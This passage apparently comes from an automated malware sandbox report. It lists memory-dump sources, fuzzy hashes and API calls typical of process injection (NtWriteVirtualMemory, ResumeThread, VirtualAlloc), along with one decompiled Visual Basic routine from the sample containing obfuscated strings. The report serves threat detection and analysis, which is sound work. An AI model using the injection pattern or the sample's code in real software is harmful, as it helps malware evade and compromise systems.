                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: E>
                    • API String ID: 4275171209-855000429
                    • Opcode ID: 438b530d07525076249d5500dd81a0f808f93beafd43bd280e7b4bceb66b84a4
                    • Instruction ID: 99dd2135415cf157fae98f5a96e407e5968a581688a5a073e6e10730b26765dc
                    • Opcode Fuzzy Hash: 438b530d07525076249d5500dd81a0f808f93beafd43bd280e7b4bceb66b84a4
                    • Instruction Fuzzy Hash: CCD16DD5A2E703C5E493657140C547154A4EEA735A5738BBB6B33728C2A33E938B328F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: E>
                    • API String ID: 4275171209-855000429
                    • Opcode ID: 6bef497d9b5f4b97172db34dc01701245adf4153d42af17ecfef21b952a20b5a
                    • Instruction ID: 0c9976a05d9dd4049be2f25205429234c8763ff8644fe4b66d3c31dd3cf41106
                    • Opcode Fuzzy Hash: 6bef497d9b5f4b97172db34dc01701245adf4153d42af17ecfef21b952a20b5a
                    • Instruction Fuzzy Hash: 92E15CD5A2E703C6E49365B140C543154A4EEA735A5738BBB6B33728C2A33E534B728F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: E>
                    • API String ID: 4275171209-855000429
                    • Opcode ID: 52bfa5a8b7e36eeec5deebe43f23a49de523933cb62accdb20ce2fdcbec48f5c
                    • Instruction ID: ec6385e80530e1c63d068ebd7a092bb9023b5f6bf5db92ffd4e523cacb32beec
                    • Opcode Fuzzy Hash: 52bfa5a8b7e36eeec5deebe43f23a49de523933cb62accdb20ce2fdcbec48f5c
                    • Instruction Fuzzy Hash: 10D16ED5A2E703C5E49365B140C547154A4EEE735A5738BBB6B23728C2A33E834B328F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 800b3f75948befbf3efb4c197ddbe2c41fa011944ae51ecf0feb7c8441892d21
                    • Instruction ID: 03891df15875d52321c3ef5f4e203c16cbbc9fbf4c29434d059518c6de572163
                    • Opcode Fuzzy Hash: 800b3f75948befbf3efb4c197ddbe2c41fa011944ae51ecf0feb7c8441892d21
                    • Instruction Fuzzy Hash: B3B136B0340305AFEF2A5E20CD96BEA3766EF49780F558128FE845B1C0C3B998D99B45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 00312783
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: LibraryLoadMemoryVirtualWrite
                    • String ID:
                    • API String ID: 3569954152-0
                    • Opcode ID: c7b9860b2ca21dd3f5506567b68fa810542c40d54807522489c0a70eb37e1756
                    • Instruction ID: 558a0ec225665c2a222b99d2037c2baccd6835ff7802a9a1e3c4666512bba25f
                    • Opcode Fuzzy Hash: c7b9860b2ca21dd3f5506567b68fa810542c40d54807522489c0a70eb37e1756
                    • Instruction Fuzzy Hash: 2FA102B0340305AFEB2A5E20CC86BEA3762EF59780F658128FD845B1C0C7B998D69B45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5b13b7fe4f2800007817ae4283d17bc8aaad6a6fc37901866109567dcad5b89d
                    • Instruction ID: edb1d1befd8c06dac63a8205fccf7e7310d6f990cb4924a90d46ecd4e8fc446e
                    • Opcode Fuzzy Hash: 5b13b7fe4f2800007817ae4283d17bc8aaad6a6fc37901866109567dcad5b89d
                    • Instruction Fuzzy Hash: 6D9156B0340306FFFB2A5E20CC96BEA3666EF59344F658128FD859B1C0C7B998D69704
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 00312783
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: LibraryLoadMemoryVirtualWrite
                    • String ID:
                    • API String ID: 3569954152-0
                    • Opcode ID: d54f339f9087c76ba3b9803710847bd03c3ff50a480e7db7564bf4283a83c6ad
                    • Instruction ID: dfce49c1d8069314012c762acc9385ba9544f3aa9544709316e9ef17cb5b1817
                    • Opcode Fuzzy Hash: d54f339f9087c76ba3b9803710847bd03c3ff50a480e7db7564bf4283a83c6ad
                    • Instruction Fuzzy Hash: 558134B034030AAFFB2A5E20CD95BEA7662EF59340F958128FD859B2C0D7B998D58744
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 00312783
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: MemoryVirtualWrite
                    • String ID:
                    • API String ID: 3527976591-0
                    • Opcode ID: a0effeb6b12b8d73c1df3db14bb383a32a7b85c17417f95c248ffe9f558a6559
                    • Instruction ID: 9b4f2a59ff11d4c54a57e9976af7a09aa21ff37742cde1d6794c03c6a7e51735
                    • Opcode Fuzzy Hash: a0effeb6b12b8d73c1df3db14bb383a32a7b85c17417f95c248ffe9f558a6559
                    • Instruction Fuzzy Hash: 1D7134B0340309AFFB2A5F10CD95BEA7762EF59344F958128FD849B2C0C7B998E99740
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 00312783
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: MemoryVirtualWrite
                    • String ID:
                    • API String ID: 3527976591-0
                    • Opcode ID: e92ad1ce50f4631569b3add81fed85fc6b0b0604852b53f66895233a0847dedb
                    • Instruction ID: 73677dfb5660459e75107510eb7eaf8cc12f966a6436a3f7ff378b8514580280
                    • Opcode Fuzzy Hash: e92ad1ce50f4631569b3add81fed85fc6b0b0604852b53f66895233a0847dedb
                    • Instruction Fuzzy Hash: 4A61F1B0340309BFFB2A5F10CD96BEA7662FF19344F558128FD859A2C0C7B998E99744
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 00312783
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: MemoryVirtualWrite
                    • String ID:
                    • API String ID: 3527976591-0
                    • Opcode ID: c5cd357952217f11fccc880cdc6c7caf361d92fe4eedac8663cb1e394a2df912
                    • Instruction ID: c812a4a6c593a1b1f9065a4fb9b4ef93222687e81b4b30ed9647c0294f4cf75b
                    • Opcode Fuzzy Hash: c5cd357952217f11fccc880cdc6c7caf361d92fe4eedac8663cb1e394a2df912
                    • Instruction Fuzzy Hash: 3351E170340349BFFF2A5E10CDD6BEA3666EF59380F558128FE859A1D0C7B99CE99600
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: a27ac88b18a0cf68898b2539ebf2e3e7f7d6ac29fc2c2a52ec60417ad535a27f
                    • Instruction ID: 1fbd5ffe86f0410f7bc1e157f4dcb7d83f222430170aec939ac55b2e6982ffee
                    • Opcode Fuzzy Hash: a27ac88b18a0cf68898b2539ebf2e3e7f7d6ac29fc2c2a52ec60417ad535a27f
                    • Instruction Fuzzy Hash: 8441BC35208306CFEB2F5DB4C9967E56757AF6E320FA69939C89387865E330C8C69501
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8e5038dde8e7f07ae646b17e552c37e9d4603d57097b97616dc4954fefa9063b
                    • Instruction ID: 78662f752aacba5eff191012b29d3d742325e71e52df639a31ea80f131c825ad
                    • Opcode Fuzzy Hash: 8e5038dde8e7f07ae646b17e552c37e9d4603d57097b97616dc4954fefa9063b
                    • Instruction Fuzzy Hash: 6C41AF35208305CFEB2F0EB4C8567E56757AF6E320FA65939C85387861D330C8C5D601
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: e4f6d4936681bae7ed82004eb08427368475e654e465bac59e5dd261f05f7652
                    • Instruction ID: 89c3b1b6b22975cc9623bed40bebd712e977eb43f2b6b634aa6e92ffd909e190
                    • Opcode Fuzzy Hash: e4f6d4936681bae7ed82004eb08427368475e654e465bac59e5dd261f05f7652
                    • Instruction Fuzzy Hash: 03418B35208206CFEB2F1EB4C8567F56757AF6E320FAA5939C86387861E334C8C69601
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: d43752ed222de2f07a970f03f62b49e04636d42826f0873387e8b061e4c0ea28
                    • Instruction ID: 4e23da243fc74bcbefef224270665d2613dba5f211b35b65707b2de568bc58e9
                    • Opcode Fuzzy Hash: d43752ed222de2f07a970f03f62b49e04636d42826f0873387e8b061e4c0ea28
                    • Instruction Fuzzy Hash: 24416C35208306CFEB2F1DB4C9667E56756AF6E320FA65929C863C7961E334C8C5D601
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: da1907745b5f16c4153e732f3ab223196740eccdc58baa17209fcf62c5369363
                    • Instruction ID: ebf708efc1f26df141cd2ea12de2ea1200f08ff6aa33adcfa847e447778b74df
                    • Opcode Fuzzy Hash: da1907745b5f16c4153e732f3ab223196740eccdc58baa17209fcf62c5369363
                    • Instruction Fuzzy Hash: 1F317B35608306CFEB2F1EB0C8667E52756AF6E320FAA5929C86387971D334C8C5D601
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 00312783
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: MemoryVirtualWrite
                    • String ID:
                    • API String ID: 3527976591-0
                    • Opcode ID: 249470a49a8d98ff69c7caabcab2f5e5722da3fa4f9f724e30d5171d5fc8b0dc
                    • Instruction ID: 37bceadfd8723a8d9a9cebbd9f314fc1b604fbaa85e33eec80602ad9ec4bbdcf
                    • Opcode Fuzzy Hash: 249470a49a8d98ff69c7caabcab2f5e5722da3fa4f9f724e30d5171d5fc8b0dc
                    • Instruction Fuzzy Hash: A941E070740309AFFF2A5E10CDD5BEA7666FF18384F998128FE859A1D0C7B848E99700
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: cbe42170eda2a0b31139f48023a8f778f09492e3f8f65b2cdd921b6a5eb05a79
                    • Instruction ID: a63bad9ddb3733a83ec6ffd0819cf5d3de38da94cb63b5ebf7867689506d1ffa
                    • Opcode Fuzzy Hash: cbe42170eda2a0b31139f48023a8f778f09492e3f8f65b2cdd921b6a5eb05a79
                    • Instruction Fuzzy Hash: A4316735204206CFEB2F1EB0C8663E56756AF2E320FEA5969C862C7971D334C8C5CA01
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: c93ce533108b93e81efe02108c1f0c7fa303f673b485247b83a5cfd542ac9bb5
                    • Instruction ID: f04720b3d3de261725e124ca47b6e7f76e2bdd41840482086c0bf7c87947c27f
                    • Opcode Fuzzy Hash: c93ce533108b93e81efe02108c1f0c7fa303f673b485247b83a5cfd542ac9bb5
                    • Instruction Fuzzy Hash: EA316D35604205CFEF2F1EB4C8563E57756AF2E320FDA5965C86287971D334C8C5C601
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 5cf53c7d16e79977f75a20c76f60ca71b611e1c225de6ef4e8165a3e437b22dd
                    • Instruction ID: 57256b00afa4fc95f567645480005ce71eeee5fa1060acfc5e9c6d3c8b394f66
                    • Opcode Fuzzy Hash: 5cf53c7d16e79977f75a20c76f60ca71b611e1c225de6ef4e8165a3e437b22dd
                    • Instruction Fuzzy Hash: 24314935604206CFEB2F1EB4C8567E57B56AF2E320FEA5969C862C7971D334C8C5C641
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 7d2cc9a9980ce75b53456217ff6a9159e5023449964feed892f952dc84ba6c43
                    • Instruction ID: 5603df335fab961a0f51c92f6c15b531120b68bad797e059c425261a9a117633
                    • Opcode Fuzzy Hash: 7d2cc9a9980ce75b53456217ff6a9159e5023449964feed892f952dc84ba6c43
                    • Instruction Fuzzy Hash: F6213B35604205CFEB2E1E74C8697D57B92AF3A320FDA5959C8A2CB4B0D334C8D5CB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 00312783
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: MemoryVirtualWrite
                    • String ID:
                    • API String ID: 3527976591-0
                    • Opcode ID: f8d65670152e9525930e894010c9818f94664eaa2e997f2c3486d60d0d648629
                    • Instruction ID: d10e7f8e098298c51e846d5d3e65695bc982d81a1831b06bf349f906da3a2bdb
                    • Opcode Fuzzy Hash: f8d65670152e9525930e894010c9818f94664eaa2e997f2c3486d60d0d648629
                    • Instruction Fuzzy Hash: 4021C070B40209EFEB1A6E20CE95BDA77B3FF59380FD98224FD8556190CB3948E58750
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: fbafeb0e1a69d98279b6a8d12122e00519fee77eb97c5721d693cefb396c3f6e
                    • Instruction ID: 3291bc81a186868499a6efc871ae9ea91faa634ff1fef56b64b19d44d7a480d7
                    • Opcode Fuzzy Hash: fbafeb0e1a69d98279b6a8d12122e00519fee77eb97c5721d693cefb396c3f6e
                    • Instruction Fuzzy Hash: ED112B39604205CFEB2F5EB4C8593D17B62AF3A324FDE5955C8A18B471D330C8D4C651
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 00312783
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: MemoryVirtualWrite
                    • String ID:
                    • API String ID: 3527976591-0
                    • Opcode ID: c5afe4dfa15c1be37158547814ac5a51bfc282234dd294ef3d741ce5f93046d2
                    • Instruction ID: d993c73eab41f189641ecc280c9b84c1893dd052429726c03ac611c59d7b2501
                    • Opcode Fuzzy Hash: c5afe4dfa15c1be37158547814ac5a51bfc282234dd294ef3d741ce5f93046d2
                    • Instruction Fuzzy Hash: 9A116D7074064AEFEF1A6F20CD90BD9BA73BF19384F995224FD88550A0CB7648E59740
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 2f58cb3c5456eac9d60582526df4f566d01b0efe435bd26f3126466fd99c82ce
                    • Instruction ID: 558773b984cccfdc7f6e9bdeff8513dbaa5876be02b3cf45e8cb8d5a7f5507d0
                    • Opcode Fuzzy Hash: 2f58cb3c5456eac9d60582526df4f566d01b0efe435bd26f3126466fd99c82ce
                    • Instruction Fuzzy Hash: 9FF05C26B403574E672F2AB8C5753E22B279C7B3207CD4905CC91CB834F721C8D5C204
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00315609,00000040,00310570,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00315A87
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: MemoryProtectVirtual
                    • String ID:
                    • API String ID: 2706961497-0
                    • Opcode ID: 6778930c994b4e16628e103e67a772ae27ec30a5872c99b95d6df90db3f68d8d
                    • Instruction ID: 25e40e74b59276d6f5ce34737175f32982b68450b30fcba362293b3e3ffdab88
                    • Opcode Fuzzy Hash: 6778930c994b4e16628e103e67a772ae27ec30a5872c99b95d6df90db3f68d8d
                    • Instruction Fuzzy Hash: 11C012E06140006E65048D28CD48D2772AA86D5628B14C31CB831222CCC530DC044131
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 1b363aea7f51bcad3bb88953dae251e8b57876ea322b0870d96448b80e178b92
                    • Instruction ID: c6d9f4959cac733e47960aa313651a37c122a51d6684f07c46260ee774a6cf8e
                    • Opcode Fuzzy Hash: 1b363aea7f51bcad3bb88953dae251e8b57876ea322b0870d96448b80e178b92
                    • Instruction Fuzzy Hash: 8BD012245503054D7F1D6DB1C6E438A3A265CE5104799891CD892D2518EA31C4898514
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 62%
                    			E0040BE20(void* __ebx, void* __edi, void* __esi, signed int _a4) {
                    				signed int _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				short _v28;
                    				char _v32;
                    				char _v36;
                    				char _v40;
                    				void* _v44;
                    				char _v48;
                    				char _v52;
                    				char _v60;
                    				signed int _v64;
                    				signed int _v76;
                    				signed int _v80;
                    				signed int _v84;
                    				signed int _v88;
                    				signed int _t89;
                    				signed int _t95;
                    				signed int _t112;
                    				signed int _t115;
                    				void* _t127;
                    				void* _t129;
                    				intOrPtr _t130;
                    
                    				_t130 = _t129 - 0xc;
                    				 *[fs:0x0] = _t130;
                    				L00401120();
                    				_v16 = _t130;
                    				_v12 = 0x4010d0;
                    				_v8 = _a4 & 0x00000001;
                    				_a4 = _a4 & 0x000000fe;
                    				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x40,  *[fs:0x0], 0x401126, _t127);
                    				_t89 =  *((intOrPtr*)( *_a4 + 0x14c))(_a4, 0);
                    				asm("fclex");
                    				_v64 = _t89;
                    				if(_v64 >= 0) {
                    					_v76 = _v76 & 0x00000000;
                    				} else {
                    					_push(0x14c);
                    					_push(0x4020d4);
                    					_push(_a4);
                    					_push(_v64);
                    					L004011F2();
                    					_v76 = _t89;
                    				}
                    				L004011DA();
                    				L004011DA();
                    				_t95 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v36, 0x60c952,  &_v40,  &_v48);
                    				_v64 = _t95;
                    				if(_v64 >= 0) {
                    					_v80 = _v80 & 0x00000000;
                    				} else {
                    					_push(0x6fc);
                    					_push(0x402104);
                    					_push(_a4);
                    					_push(_v64);
                    					L004011F2();
                    					_v80 = _t95;
                    				}
                    				_v32 = _v48;
                    				L004011D4();
                    				L004011DA();
                    				_v60 =  *0x4010c8;
                    				L004011DA();
                    				_v52 = 0x2b299e;
                    				_v48 = 0x7eadd8;
                    				 *((intOrPtr*)(_t130 + 0xc)) =  *0x4010c0;
                    				 *((intOrPtr*)( *_a4 + 0x704))(_a4, L"o9YGH4XNtHpCBImXjLZ2nNt991",  &_v48,  &_v36,  &_v52, 0x335dba,  &_v36,  &_v60,  &_v40, 0x476f,  &_v44, 2,  &_v36,  &_v40);
                    				_v28 = _v44;
                    				L004011D4();
                    				_t112 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 2,  &_v36,  &_v40);
                    				asm("fclex");
                    				_v64 = _t112;
                    				if(_v64 >= 0) {
                    					_v84 = _v84 & 0x00000000;
                    				} else {
                    					_push(0x2b4);
                    					_push(0x4020d4);
                    					_push(_a4);
                    					_push(_v64);
                    					L004011F2();
                    					_v84 = _t112;
                    				}
                    				_t115 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
                    				_v64 = _t115;
                    				if(_v64 >= 0) {
                    					_v88 = _v88 & 0x00000000;
                    				} else {
                    					_push(0x6f8);
                    					_push(0x402104);
                    					_push(_a4);
                    					_push(_v64);
                    					L004011F2();
                    					_v88 = _t115;
                    				}
                    				_v8 = 0;
                    				asm("wait");
                    				_push(E0040C034);
                    				return _t115;
                    			}

                    APIs
                    • __vbaChkstk.MSVBVM60(?,00401126), ref: 0040BE3C
                    • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,004020D4,0000014C), ref: 0040BE95
                    • __vbaStrCopy.MSVBVM60(00000000,004010D0,004020D4,0000014C), ref: 0040BEAB
                    • __vbaStrCopy.MSVBVM60(00000000,004010D0,004020D4,0000014C), ref: 0040BEB8
                    • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,00402104,000006FC), ref: 0040BEF5
                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BF13
                    • __vbaStrCopy.MSVBVM60(?,?,00401126), ref: 0040BF23
                    • __vbaStrCopy.MSVBVM60(?,?,00401126), ref: 0040BF39
                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,002B299E,00335DBA,?,?,?,0000476F,?), ref: 0040BF9D
                    • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,004020D4,000002B4), ref: 0040BFCE
                    • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,00402104,000006F8), ref: 0040C003
                    Strings
                    • o9YGH4XNtHpCBImXjLZ2nNt991, xrefs: 0040BF78
                    • MNMtjbRHx4PbamJpWQ2180, xrefs: 0040BF1B
                    • jmScNPZCAAwKcVgBIo2X100, xrefs: 0040BEA3
                    • bqBgWjLCBrgJI06100, xrefs: 0040BEB0
                    • eqKIW9fmNogmTZ4tlGfq9pLYrWa2MF69OEa121, xrefs: 0040BF31
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp
                    Similarity
                    • API ID: __vba$CheckCopyHresult$FreeList$Chkstk
                    • String ID: MNMtjbRHx4PbamJpWQ2180$bqBgWjLCBrgJI06100$eqKIW9fmNogmTZ4tlGfq9pLYrWa2MF69OEa121$jmScNPZCAAwKcVgBIo2X100$o9YGH4XNtHpCBImXjLZ2nNt991
                    • API String ID: 136807637-645893437
                    • Opcode ID: e164a2b189606a8831389660117d84bb35d13d4b55d18a24915d3d3119ff5a21
                    • Instruction ID: 519a5d37f5daf25abc16070865b238d90d8f52d6e4d3c1e414c6b7a1e94efcca
                    • Opcode Fuzzy Hash: e164a2b189606a8831389660117d84bb35d13d4b55d18a24915d3d3119ff5a21
                    • Instruction Fuzzy Hash: A061F471900209EFCB04DF95D985BEDBBB9FF08344F10807AFA05BA1A0D77999558F98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LdrInitializeThunk.NTDLL(0031157A,?,00000000,?,00000017,0000035D,?,003139E3,?), ref: 0031376A
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: ninet.dll
                    • API String ID: 2994545307-2962335871
                    • Opcode ID: bce733e9210052c127451b0198ece1ace0de3648f7146aa2051b3cb6dbbe07d7
                    • Instruction ID: 389800b6e1893a5fd3700caaa487bf5dee36f1253db005d5b064e5a0d3b6d91b
                    • Opcode Fuzzy Hash: bce733e9210052c127451b0198ece1ace0de3648f7146aa2051b3cb6dbbe07d7
                    • Instruction Fuzzy Hash: B6D05B750446418FD619F714894BFCB77B0EB40740F04C47954438B962D730A61AD685
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: E>
                    • API String ID: 4275171209-855000429
                    • Opcode ID: ee27a51529d553255a0e5df47d2404c385a02f42e3a73fd186ed247afbca5910
                    • Instruction ID: 543fa372f36628f1aa98f6d776eddfbd376170e5aaa6fc3331ea6e28a99fae3b
                    • Opcode Fuzzy Hash: ee27a51529d553255a0e5df47d2404c385a02f42e3a73fd186ed247afbca5910
                    • Instruction Fuzzy Hash: 1BD15ED5A2E703C5F49365B140C547154A4EEA735A5738BBB6B23728C2A33E934B328F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
